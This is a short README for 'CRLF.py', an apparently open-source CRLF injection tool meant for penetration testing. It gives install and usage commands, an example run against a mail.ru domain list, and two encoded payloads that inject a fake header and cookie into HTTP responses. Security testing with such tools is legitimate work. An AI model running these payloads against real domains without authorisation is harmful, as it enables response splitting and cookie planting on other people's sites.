CRLF.py

CRLF – Auto CRLF Injector

Author: Rudra Sarkar

Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.

Installation

pip install requests

git clone https://github.com/rudSarkar/crlf-injector.git

Usage

$ python crlf.py



Use $ python crlf.py [domain_list.ext] [crlf_payload]



e.g $ python crlf.py mail.ru.list /%0aevil-here:malicious_cookie1

Payloads:

/%0aevil-here:malicious_cookie1

/%0d%0aevil-here:malicious_cookie1

Source: https://github.com/rudSarkar/crlf-injector